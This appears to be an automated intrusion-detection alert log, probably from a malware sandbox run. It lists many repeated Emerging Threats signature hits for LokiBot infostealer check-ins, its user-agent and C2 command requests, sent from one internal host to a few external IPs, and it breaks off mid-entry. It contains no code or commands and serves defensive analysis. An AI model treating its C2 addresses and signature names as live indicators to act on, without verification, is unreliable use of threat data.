ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:07.989686
SID:	2825766
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:26.597772
SID:	2025381
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:21.836224
SID:	2021641
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:09.943896
SID:	2021641
Source Port:	49252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:31.712532
SID:	2025381
Source Port:	49216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:04.176231
SID:	2021641
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:02.368807
SID:	2025381
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:52.425128
SID:	2024313
Source Port:	49233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:30.957362
SID:	2021641
Source Port:	49215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:52.425128
SID:	2024318
Source Port:	49233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:01.557933
SID:	2021641
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:59.837093
SID:	2825766
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:06.045591
SID:	2825766
Source Port:	49192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:13.398917
SID:	2825766
Source Port:	49256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:50.058542
SID:	2825766
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:23.674890
SID:	2024318
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:04.226888
SID:	2024318
Source Port:	49246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:24.566045
SID:	2825766
Source Port:	49208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:51.806006
SID:	2021641
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:04.226888
SID:	2024313
Source Port:	49246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:50.944456
SID:	2024318
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:09.943896
SID:	2825766
Source Port:	49252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:18.441021
SID:	2025381
Source Port:	49262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:46.332436
SID:	2025381
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.020535
SID:	2825766
Source Port:	49249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:03.278750
SID:	2024313
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:48.359257
SID:	2025381
Source Port:	49229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:59.521470
SID:	2025381
Source Port:	49241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:50.944456
SID:	2024313
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:59.837093
SID:	2021641
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:23.674890
SID:	2024313
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:36.624490
SID:	2025381
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:28.376454
SID:	2825766
Source Port:	49212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:35.132025
SID:	2825766
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:44.106859
SID:	2025381
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:17:43.183162
SID:	2024318
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:03.278750
SID:	2024318
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.020535
SID:	2021641
Source Port:	49249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:17.653379
SID:	2021641
Source Port:	49261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:53.400223
SID:	2025381
Source Port:	49234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:17:43.183162
SID:	2024313
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:16.882044
SID:	2024313
Source Port:	49260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:46.332436
SID:	2825766
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:46.517579
SID:	2025381
Source Port:	49227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:16.882044
SID:	2024318
Source Port:	49260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:15.184596
SID:	2025381
Source Port:	49258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:58.594043
SID:	2825766
Source Port:	49240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:01.557933
SID:	2825766
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:41.210686
SID:	2825766
Source Port:	49221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:47.208604
SID:	2025381
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:04.176231
SID:	2025381
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:16.270962
SID:	2021641
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:51.088057
SID:	2021641
Source Port:	49232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:56.984952
SID:	2024313
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:00.736741
SID:	2024313
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:23.674890
SID:	2025381
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.093323
SID:	2021641
Source Port:	49237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:06.045591
SID:	2025381
Source Port:	49192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:17.156368
SID:	2825766
Source Port:	49200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:00.736741
SID:	2024318
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:56.984952
SID:	2024318
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:06.064261
SID:	2025381
Source Port:	49248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:38.077506
SID:	2825766
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.909324
SID:	2825766
Source Port:	49238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:43.784658
SID:	2021641
Source Port:	49224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:20.882874
SID:	2025381
Source Port:	49204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:48.359257
SID:	2825766
Source Port:	49229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:53.400223
SID:	2021641
Source Port:	49234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.020535
SID:	2024313
Source Port:	49249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:18.976087
SID:	2825766
Source Port:	49202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:25.484710
SID:	2024318
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:29.294238
SID:	2021641
Source Port:	49213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:36.624490
SID:	2825766
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:49.147570
SID:	2021641
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:04.226888
SID:	2021641
Source Port:	49246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:18.441021
SID:	2021641
Source Port:	49262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:47.208604
SID:	2825766
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:38.560340
SID:	2025381
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:48.088333
SID:	2024318
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:58.820260
SID:	2024313
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:44.106859
SID:	2825766
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:48.088333
SID:	2024313
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:58.820260
SID:	2024318
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:42.915752
SID:	2025381
Source Port:	49223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:59.837093
SID:	2024318
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.888746
SID:	2024318
Source Port:	49250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:03.278750
SID:	2021641
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:50.944456
SID:	2825766
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:59.837093
SID:	2024313
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:45.625277
SID:	2021641
Source Port:	49226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.888746
SID:	2024313
Source Port:	49250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:27.512891
SID:	2825766
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:25.484710
SID:	2024313
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.020535
SID:	2024318
Source Port:	49249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:02.368807
SID:	2021641
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:08.863871
SID:	2825766
Source Port:	49251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:35.132025
SID:	2025381
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:19:05.135747
SID:	2021641
Source Port:	49247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:45.155201
SID:	2024313
Source Port:	49172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:24.566045
SID:	2024318
Source Port:	49208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:17:43.183162
SID:	2021641
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:45.155201
SID:	2024318
Source Port:	49172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:14.278026
SID:	2021641
Source Port:	49257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:18.079750
SID:	2021641
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:24.566045
SID:	2024313
Source Port:	49208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:29.294238
SID:	2825766
Source Port:	49213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:12.597934
SID:	2025381
Source Port:	49255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:07.989686
SID:	2025381
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:39.381191
SID:	2024313
Source Port:	49219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:49.167216
SID:	2024318
Source Port:	49230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:54.312724
SID:	2021641
Source Port:	49235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:50.061779
SID:	2825766
Source Port:	49231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:57.920775
SID:	2025381
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:59.521470
SID:	2024318
Source Port:	49241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:26.597772
SID:	2825766
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:49.167216
SID:	2024313
Source Port:	49230
Destination Port:	80
